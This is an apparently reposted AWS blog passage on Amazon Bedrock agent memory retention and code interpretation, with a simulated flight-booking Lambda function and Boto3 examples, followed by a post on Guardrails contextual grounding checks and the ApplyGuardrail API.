Book a flight at a given date and time between two destinations.

Again, all parameters are required and of type string. These are the names and descriptions for the parameters:

origin_airport – Origin IATA airport code
destination_airport – Destination IATA airport code
date – Date of the flight in YYYYMMDD format
time – Time of the flight in HHMM format

To complete the creation of the agent, I choose Create.

To access the source code of the Lambda function, I choose the search-and-book-flights action group and then View (near the Select Lambda function settings). Normally, I’d use this Lambda function to integrate with an existing system such as a travel booking platform. In this case, I use this code to simulate a booking platform for the agent.

import json
import random
from datetime import datetime, time, timedelta


def convert_params_to_dict(params_list):
    params_dict = {}
    for param in params_list:
        name = param.get("name")
        value = param.get("value")
        if name is not None:
            params_dict[name] = value
    return params_dict


def generate_random_times(date_str, num_flights, min_hours, max_hours):
    # Set seed based on input date
    seed = int(date_str)
    random.seed(seed)

    # Convert min_hours and max_hours to minutes
    min_minutes = min_hours * 60
    max_minutes = max_hours * 60

    # Generate random times
    random_times = set()
    while len(random_times) < num_flights:
        minutes = random.randint(min_minutes, max_minutes)
        hours, mins = divmod(minutes, 60)
        time_str = f"{hours:02d}{mins:02d}"
        random_times.add(time_str)

    return sorted(random_times)


def get_flights_for_date(date):
    num_flights = random.randint(1, 6) # Between 1 and 6 flights per day
    min_hours = 6 # 6am
    max_hours = 22 # 10pm
    flight_times = generate_random_times(date, num_flights, min_hours, max_hours)
    return flight_times
    
    
def get_days_between(start_date, end_date):
    # Convert string dates to datetime objects
    start = datetime.strptime(start_date, "%Y%m%d")
    end = datetime.strptime(end_date, "%Y%m%d")
    
    # Calculate the number of days between the dates
    delta = end - start
    
    # Generate a list of all dates between start and end (inclusive)
    date_list = [start + timedelta(days=i) for i in range(delta.days + 1)]
    
    # Convert datetime objects back to "YYYYMMDD" string format
    return [date.strftime("%Y%m%d") for date in date_list]


def lambda_handler(event, context):
    print(event)
    agent = event['agent']
    actionGroup = event['actionGroup']
    function = event['function']
    param = convert_params_to_dict(event.get('parameters', []))

    if actionGroup == 'search-and-book-flights':
        if function == 'search-for-flights':
            flight_times = get_flights_for_date(param['date'])
            body = f"On {param['date']} (YYYYMMDD), these are the flights from {param['origin_airport']} to {param['destination_airport']}:n{json.dumps(flight_times)}"
        elif function == 'book-flight':
            body = f"Flight from {param['origin_airport']} to {param['destination_airport']} on {param['date']} (YYYYMMDD) at {param['time']} (HHMM) booked and confirmed."
        elif function == 'get-flights-in-date-range':
            days = get_days_between(param['start_date'], param['end_date'])
            flights = {}
            for day in days:
                flights[day] = get_flights_for_date(day)
            body = f"These are the times (HHMM) for all the flights from {param['origin_airport']} to {param['destination_airport']} between {param['start_date']} (YYYYMMDD) and {param['end_date']} (YYYYMMDD) in JSON format:n{json.dumps(flights)}"
        else:
            body = f"Unknown function {function} for action group {actionGroup}."
    else:
        body = f"Unknown action group {actionGroup}."
    
    # Format the output as expected by the agent
    responseBody =  {
        "TEXT": {
            "body": body
        }
    }

    action_response = {
        'actionGroup': actionGroup,
        'function': function,
        'functionResponse': {
            'responseBody': responseBody
        }

    }

    function_response = {'response': action_response, 'messageVersion': event['messageVersion']}
    print(f"Response: {function_response}")

    return function_response

I prepare the agent to test it in the console and ask this question:

Which flights are available from London Heathrow to Rome Fiumicino on July 20th, 2024?

The agent replies with a list of times. I choose Show trace to get more information about how the agent processed my instructions.

In the Trace tab, I explore the trace steps to understand the chain of thought used by the agent’s orchestration. For example, here I see that the agent handled the conversion of the airport names to codes (LHR for London Heathrow, FCO for Rome Fiumicino) before calling the Lambda function.

In the new Memory tab, I see what’s the content of the memory. The console uses a specific test memory ID. In an application, to keep memory separated for each user, I can use a different memory ID for every user.

I look at the list of flights and ask to book one:

Book the one at 6:02pm.

The agent replies confirming the booking.

After a few minutes, after the session has expired, I see a summary of my conversation in the Memory tab.

I choose the broom icon to start with a new conversation and ask a question that, by itself, doesn’t provide a full context to the agent:

Which other flights are available on the day of my flight?

The agent recalls the flight that I booked from our previous conversation. To provide me with an answer, the agent asks me to confirm the flight details. Note that the Lambda function is just a simulation and didn’t store the booking information in any database. The flight details were retrieved from the agent’s memory.

I confirm those values and get the list of the other flights with the same origin and destination on that day.

Yes, please.

To better demonstrate the benefits of memory retention, let’s call the agent using the AWS SDK for Python (Boto3). To do so, I first need to create an agent alias and version. I write down the agent ID and the alias ID because they are required when invoking the agent.

In the agent invocation, I add the new memoryId option to use memory. By including this option, I get two benefits:

The memory retained for that memoryId (if any) is used by the agent to improve its response.
A summary of the conversation for the current session is retained for that memoryId so that it can be used in another session.

Using an AWS SDK, I can also get the content or delete the content of the memory for a specific memoryId.

import random
import string
import boto3
import json

DEBUG = False # Enable debug to see all trace steps
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"

AGENT_ID = 'URSVOGLFNX'
AGENT_ALIAS_ID = 'JHLX9ERCMD'

SESSION_ID_LENGTH = 10
SESSION_ID = "".join(
    random.choices(string.ascii_uppercase + string.digits, k=SESSION_ID_LENGTH)
)

# A unique identifier for each user
MEMORY_ID = 'danilop-92f79781-a3f3-4192-8de6-890b67c63d8b' 
bedrock_agent_runtime = boto3.client('bedrock-agent-runtime', region_name='us-east-1')


def invoke_agent(prompt, end_session=False):
    response = bedrock_agent_runtime.invoke_agent(
        agentId=AGENT_ID,
        agentAliasId=AGENT_ALIAS_ID,
        sessionId=SESSION_ID,
        inputText=prompt,
        memoryId=MEMORY_ID,
        enableTrace=DEBUG,
        endSession=end_session,
    )

    completion = ""

    for event in response.get('completion'):
        if DEBUG:
            print(event)
        if 'chunk' in event:
            chunk = event['chunk']
            completion += chunk['bytes'].decode()

    return completion


def delete_memory():
    try:
        response = bedrock_agent_runtime.delete_agent_memory(
            agentId=AGENT_ID,
            agentAliasId=AGENT_ALIAS_ID,
            memoryId=MEMORY_ID,
        )
    except Exception as e:
        print(e)
        return None
    if DEBUG:
        print(response)


def get_memory():
    response = bedrock_agent_runtime.get_agent_memory(
        agentId=AGENT_ID,
        agentAliasId=AGENT_ALIAS_ID,
        memoryId=MEMORY_ID,
        memoryType='SESSION_SUMMARY',
    )
    memory = ""
    for content in response['memoryContents']:
        if 'sessionSummary' in content:
            s = content['sessionSummary']
            memory += f"Session ID {s['sessionId']} from {s['sessionStartTime'].strftime(DATE_FORMAT)} to {s['sessionExpiryTime'].strftime(DATE_FORMAT)}n"
            memory += s['summaryText'] + "n"
    if memory == "":
        memory = "<no memory>"
    return memory


def main():
    print("Delete memory? (y/n)")
    if input() == 'y':
        delete_memory()

    print("Memory content:")
    print(get_memory())

    prompt = input('> ')
    if len(prompt) > 0:
        print(invoke_agent(prompt, end_session=False)) # Start a new session
        invoke_agent('end', end_session=True) # End the session

if __name__ == "__main__":
    main()

I run the Python script from my laptop. I choose to delete the current memory (even if it should be empty for now) and then ask to book a morning flight on a specific date.

Delete memory? (y/n)
y
Memory content:
<no memory>
> Book me on a morning flight on July 20th, 2024 from LHR to FCO.
I have booked you on the morning flight from London Heathrow (LHR) to Rome Fiumicino (FCO) on July 20th, 2024 at 06:44.

I wait a couple of minutes and run the script again. The script creates a new session every time it’s run. This time, I don’t delete memory and see the summary of my previous interaction with the same memoryId. Then, I ask on which date my flight is scheduled. Even though this is a new session, the agent finds the previous booking in the content of the memory.

Delete memory? (y/n)
n
Memory content:
Session ID MM4YYW0DL2 from 2024-07-09 15:35:47 to 2024-07-09 15:35:58
The user's goal was to book a morning flight from LHR to FCO on July 20th, 2024. The assistant booked a 0644 morning flight from LHR to FCO on the requested date of July 20th, 2024. The assistant successfully booked the requested morning flight for the user. The user requested a morning flight booking on July 20th, 2024 from London Heathrow (LHR) to Rome Fiumicino (FCO). The assistant booked a 0644 flight for the specified route and date.

> Which date is my flight on?
I recall from our previous conversation that you booked a morning flight from London Heathrow (LHR) to Rome Fiumicino (FCO) on July 20th, 2024. Please confirm if this date of July 20th, 2024 is correct for the flight you are asking about.

Yes, that’s my flight!

Depending on your use case, memory retention can help track previous interactions and preferences from the same user and provide a seamless experience across sessions.

A session summary includes a general overview and the points of view of the user and the assistant. For a short session as this one, this can cause some repetition.

Code interpretation support
Agents for Amazon Bedrock now supports code interpretation, so that agents can dynamically generate and run code snippets within a secure, sandboxed environment, significantly expanding the use cases they can address, including complex tasks such as data analysis, visualization, text processing, equation solving, and optimization problems.

Agents are now able to process input files with diverse data types and formats, including CSV, XLS, YAML, JSON, DOC, HTML, MD, TXT, and PDF. Code interpretation allows agents to also generate charts, enhancing the user experience and making data interpretation more accessible.

Code interpretation is used by an agent when the large language model (LLM) determines it can help solve a specific problem more accurately and does not support by design scenarios where users request arbitrary code generation. For security, each user session is provided with an isolated, sandboxed code runtime environment.

Let’s do a quick test to see how this can help an agent handle complex tasks.

Using code interpretation in Agents for Amazon Bedrock
In the Amazon Bedrock console, I select the same agent from the previous demo (agent-book-flight) and choose Edit in Agent Builder. In the agent builder, I enable Code Interpreter under Additional Settings and save.

I prepare the agent and test it straight in the console. First, I ask a mathematical question.

Compute the sum of the first 10 prime numbers.

After a few seconds, I get the answer from the agent:

The sum of the first 10 prime numbers is 129.

That’s accurate. Looking at the traces, the agent built and ran this Python program to compute what I asked:

import math

def is_prime(n):
    if n < 2:
        return False
    for i in range(2, int(math.sqrt(n)) + 1):
        if n % i == 0:
            return False
    return True

primes = []
n = 2
while len(primes) < 10:
    if is_prime(n):
        primes.append(n)
    n += 1
    
print(f"The first 10 prime numbers are: {primes}")
print(f"The sum of the first 10 prime numbers is: {sum(primes)}")

Now, let’s go back to the agent-book-flight agent. I want to have a better understanding of the overall flights available during a long period of time. To do so, I start by adding a new function to the same action group to get all the flights available in a date range.

I name the new function get-flights-in-date-range and use this description:

Get all the flights between two destinations for each day in a date range.

All the parameters are required and of type string. These are the parameters names and descriptions:

origin_airport – Origin IATA airport code
destination_airport – Destination IATA airport code
start_date – Start date of the flight in YYYYMMDD format
end_date – End date of the flight in YYYYMMDD format

If you look at the Lambda function code I shared earlier, you’ll find that it already supports this agent function.

Now that the agent has a way to extract more information with a single function call, I ask the agent to visualize flight information data in a chart:

Draw a chart with the number of flights each day from JFK to SEA for the first ten days of August, 2024.

The agent reply includes a chart:

I choose the link to download the image on my computer:

That’s correct. In fact, the simulator in the Lambda functions generates between one and six flights per day as shown in the chart.

Using code interpretation with attached files
Because code interpretation allows agents to process and extract information from data, we introduced the capability to include documents when invoking an agent. For example, I have an Excel file with the number of flights booked for different flights:

Origin	Destination	Number of flights
LHR	FCO	636
FCO	LHR	456
JFK	SEA	921
SEA	JFK	544

Using the clip icon in the test interface, I attach the file and ask (the agent replies in bold):

What is the most popular route? And the least one?

Based on the analysis, the most popular route is JFK -> SEA with 921 bookings, and the least popular route is FCO -> LHR with 456 bookings.

How many flights in total have been booked?

The total number of booked flights across all routes is 2557.

Draw a chart comparing the % of flights booked for these routes compared to the total number.

I can look at the traces to see the Python code used to extract information from the file and pass it to the agent. I can attach more than one file and use different file formats. These options are available in AWS SDKs to let agents use files in your applications.

Things to Know
Memory retention is available in preview in all AWS Regions where Agents for Amazon Bedrocks and Anthropic’s Claude 3 Sonnet or Haiku (the models supported during the preview) are available. Code interpretation is available in preview in the US East (N. Virginia), US West (Oregon), and Europe (Frankfurt) Regions.

There are no additional costs during the preview for using memory retention and code interpretation with your agents. When using agents with these features, normal model use charges apply. When memory retention is enabled, you pay for the model used to summarize the session. For more information, see the Amazon Bedrock Pricing page.

To learn more, see the Agents for Amazon Bedrock section of the User Guide. For deep-dive technical content and to discover how others are using generative AI in their solutions, visit community.aws.

— Danilo

AWS

Guardrails for Amazon Bedrock can now detect hallucinations and safeguard apps built using custom or third-party FMs

July 10, 2024 David Leave a comment

This post was originally published on this site

Guardrails for Amazon Bedrock enables customers to implement safeguards based on application requirements and and your company’s responsible artificial intelligence (AI) policies. It can help prevent undesirable content, block prompt attacks (prompt injection and jailbreaks), and remove sensitive information for privacy. You can combine multiple policy types to configure these safeguards for different scenarios and apply them across foundation models (FMs) on Amazon Bedrock, as well as custom and third-party FMs outside of Amazon Bedrock. Guardrails can also be integrated with Agents for Amazon Bedrock and Knowledge Bases for Amazon Bedrock.

Guardrails for Amazon Bedrock provides additional customizable safeguards on top of native protections offered by FMs, delivering safety features that are among the best in the industry:

Blocks as much as 85% more harmful content
Allows customers to customize and apply safety, privacy and truthfulness protections within a single solution
Filters over 75% hallucinated responses for RAG and summarization workloads

Guardrails for Amazon Bedrock was first released in preview at re:Invent 2023 with support for policies such as content filter and denied topics. At general availability in April 2024, Guardrails supported four safeguards: denied topics, content ﬁlters, sensitive information ﬁlters, and word ﬁlters.

MAPFRE is the largest insurance company in Spain, operating in 40 countries worldwide. “MAPFRE implemented Guardrails for Amazon Bedrock to ensure Mark.IA (a RAG based chatbot) aligns with our corporate security policies and responsible AI practices.” said Andres Hevia Vega, Deputy Director of Architecture at MAPFRE. “MAPFRE uses Guardrails for Amazon Bedrock to apply content filtering to harmful content, deny unauthorized topics, standardize corporate security policies, and anonymize personal data to maintain the highest levels of privacy protection. Guardrails has helped minimize architectural errors and simplify API selection processes to standardize our security protocols. As we continue to evolve our AI strategy, Amazon Bedrock and its Guardrails feature are proving to be invaluable tools in our journey toward more efficient, innovative, secure, and responsible development practices.”

Today, we are announcing two more capabilities:

Contextual grounding checks to detect hallucinations in model responses based on a reference source and a user query.
ApplyGuardrail API to evaluate input prompts and model responses for all FMs (including FMs on Amazon Bedrock, custom and third-party FMs), enabling centralized governance across all your generative AI applications.

Contextual grounding check – A new policy type to detect hallucinations
Customers usually rely on the inherent capabilities of the FMs to generate grounded (credible) responses that are based on company’s source data. However, FMs can conflate multiple pieces of information, producing incorrect or new information – impacting the reliability of the application. Contextual grounding check is a new and fifth safeguard that enables hallucination detection in model responses that are not grounded in enterprise data or are irrelevant to the users’ query. This can be used to improve response quality in use cases such as RAG, summarization, or information extraction. For example, you can use contextual grounding checks with Knowledge Bases for Amazon Bedrock to deploy trustworthy RAG applications by filtering inaccurate responses that are not grounded in your enterprise data. The results retrieved from your enterprise data sources are used as the reference source by the contextual grounding check policy to validate the model response.

There are two filtering parameters for the contextual grounding check:

Grounding – This can be enabled by providing a grounding threshold that represents the minimum confidence score for a model response to be grounded. That is, it is factually correct based on the information provided in the reference source and does not contain new information beyond the reference source. A model response with a lower score than the defined threshold is blocked and the configured blocked message is returned.
Relevance – This parameter works based on a relevance threshold that represents the minimum confidence score for a model response to be relevant to the user’s query. Model responses with a lower score below the defined threshold are blocked and the configured blocked message is returned.

A higher threshold for the grounding and relevance scores will result in more responses being blocked. Make sure to adjust the scores based on the accuracy tolerance for your specific use case. For example, a customer-facing application in the finance domain may need a high threshold due to lower tolerance for inaccurate content.

Contextual grounding check in action
Let me walk you through a few examples to demonstrate contextual grounding checks.

I navigate to the AWS Management Console for Amazon Bedrock. From the navigation pane, I choose Guardrails, and then Create guardrail. I configure a guardrail with the contextual grounding check policy enabled and specify the thresholds for grounding and relevance.

To test the policy, I navigate to the Guardrail Overview page and select a model using the Test section. This allows me to easily experiment with various combinations of source information and prompts to verify the contextual grounding and relevance of the model response.

For my test, I use the following content (about bank fees) as the source:

• There are no fees associated with opening a checking account.
• The monthly fee for maintaining a checking account is $10.
• There is a 1% transaction charge for international transfers.
• There are no charges associated with domestic transfers.
• The charges associated with late payments of a credit card bill is 23.99%.

Then, I enter questions in the Prompt field, starting with:

"What are the fees associated with a checking account?"

I choose Run to execute and View Trace to access details:

The model response was factually correct and relevant. Both grounding and relevance scores were above their configured thresholds, allowing the model response to be sent back to the user.

Next, I try another prompt:

"What is the transaction charge associated with a credit card?"

The source data only mentions about late payment charges for credit cards, but doesn’t mention transaction charges associated with the credit card. Hence, the model response was relevant (related to the transaction charge), but factually incorrect. This resulted in a low grounding score, and the response was blocked since the score was below the configured threshold of 0.85.

Finally, I tried this prompt:

"What are the transaction charges for using a checking bank account?"

In this case, the model response was grounded, since that source data mentions the monthly fee for a checking bank account. However, it was irrelevant because the query was about transaction charges, and the response was related to monthly fees. This resulted in a low relevance score, and the response was blocked since it was below the configured threshold of 0.5.

Here is an example of how you would configure contextual grounding with the CreateGuardrail API using the AWS SDK for Python (Boto3):

   bedrockClient.create_guardrail(
        name='demo_guardrail',
        description='Demo guardrail',
        contextualGroundingPolicyConfig={
            "filtersConfig": [
                {
                    "type": "GROUNDING",
                    "threshold": 0.85,
                },
                {
                    "type": "RELEVANCE",
                    "threshold": 0.5,
                }
            ]
        },
    )

After creating the guardrail with contextual grounding check, it can be associated with Knowledge Bases for Amazon Bedrock, Agents for Amazon Bedrock, or referenced during model inference.

But, that’s not all!

ApplyGuardrail – Safeguard applications using FMs available outside of Amazon Bedrock
Until now, Guardrails for Amazon Bedrock was primarily used to evaluate input prompts and model responses for FMs available in Amazon Bedrock, only during the model inference.

Guardrails for Amazon Bedrock now supports a new ApplyGuardrail API to evaluate all user inputs and model responses against the configured safeguards. This capability enables you to apply standardized and consistent safeguards for all your generative AI applications built using any self-managed (custom), or third-party FMs, regardless of the underlying infrastructure. In essence, you can now use Guardrails for Amazon Bedrock to apply the same set of safeguards on input prompts and model responses for FMs available in Amazon Bedrock, FMs available in other services (such as Amazon SageMaker), on infrastructure such as Amazon Elastic Compute Cloud (Amazon EC2), on on-premises deployments, and other third-party FMs beyond Amazon Bedrock.

In addition, you can also use the ApplyGuardrail API to evaluate user inputs and model responses independently at different stages of your generative AI applications, enabling more flexibility in application development. For example, in a RAG application, you can use guardrails to evaluate and filter harmful user inputs prior to performing a search on your knowledge base. Subsequently, you can evaluate the output separately after completing the retrieval (search) and the generation step from the FM.

Let me show you how to use the ApplyGuardrail API in an application. In the following example, I have used the AWS SDK for Python (Boto3).

I started by creating a new guardrail (using the create_guardrail function) along with a set of denied topics, and created a new version (using the create_guardrail_version function):

import boto3

bedrockRuntimeClient = boto3.client('bedrock-runtime', region_name="us-east-1")
bedrockClient = boto3.client('bedrock', region_name="us-east-1")
guardrail_name = 'fiduciary-advice'

def create_guardrail():
    
    create_response = bedrockClient.create_guardrail(
        name=guardrail_name,
        description='Prevents the model from providing fiduciary advice.',
        topicPolicyConfig={
            'topicsConfig': [
                {
                    'name': 'Fiduciary Advice',
                    'definition': 'Providing personalized advice or recommendations on managing financial assets in a fiduciary capacity.',
                    'examples': [
                        'What stocks should I invest in for my retirement?',
                        'Is it a good idea to put my money in a mutual fund?',
                        'How should I allocate my 401(k) investments?',
                        'What type of trust fund should I set up for my children?',
                        'Should I hire a financial advisor to manage my investments?'
                    ],
                    'type': 'DENY'
                }
            ]
        },
        blockedInputMessaging='I apologize, but I am not able to provide personalized advice or recommendations on managing financial assets in a fiduciary capacity.',
        blockedOutputsMessaging='I apologize, but I am not able to provide personalized advice or recommendations on managing financial assets in a fiduciary capacity.',
    )

    version_response = bedrockClient.create_guardrail_version(
        guardrailIdentifier=create_response['guardrailId'],
        description='Version of Guardrail to block fiduciary advice'
    )

    return create_response['guardrailId'], version_response['version']

Once the guardrail was created, I invoked the apply_guardrail function with the required text to be evaluated along with the ID and version of the guardrail that I just created:

def apply(guardrail_id, guardrail_version):

    response = bedrockRuntimeClient.apply_guardrail(guardrailIdentifier=guardrail_id,guardrailVersion=guardrail_version, source='INPUT', content=[{"text": {"inputText": "How should I invest for my retirement? I want to be able to generate $5,000 a month"}}])
                                                                                                                                                    
    print(response["output"][0]["text"])

I used the following prompt:

How should I invest for my retirement? I want to be able to generate $5,000 a month

Thanks to the guardrail, the message got blocked and the pre-configured response was returned:

I apologize, but I am not able to provide personalized advice or recommendations on managing financial assets in a fiduciary capacity.

In this example, I set the source to INPUT, which means that the content to be evaluated is from a user (typically the LLM prompt). To evaluate the model output, the source should be set to OUTPUT.

Now available
Contextual grounding check and the ApplyGuardrail API are available today in all AWS Regions where Guardrails for Amazon Bedrock is available. Try them out in the Amazon Bedrock console, and send feedback to AWS re:Post for Amazon Bedrock or through your usual AWS contacts.

To learn more about Guardrails, visit the Guardrails for Amazon Bedrock product page and the Amazon Bedrock pricing page to understand the costs associated with Guardrail policies.

Don’t forget to visit the community.aws site to find deep-dive technical content on solutions and discover how our builder communities are using Amazon Bedrock in their solutions.

— Abhishek

Iron Castle Systems

Protected OOXML Spreadsheets, (Mon, Jul 15th)

16-bit Hash Collisions in .xls Spreadsheets, (Sat, Jul 13th)

Attacks against the "Nette" PHP framework CVE-2020-15227, (Fri, Jul 12th)

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots, (Thu, Jul 11th)

Vector search for Amazon MemoryDB is now generally available

Build enterprise-grade applications with natural language using AWS App Studio (preview)

Amazon Q Apps, now generally available, enables users to build their own generative AI apps

Customize Amazon Q Developer (in your IDE) with your private code base

Agents for Amazon Bedrock now support memory retention and code interpretation (preview)

Guardrails for Amazon Bedrock can now detect hallucinations and safeguard apps built using custom or third-party FMs

Iron Castle Systems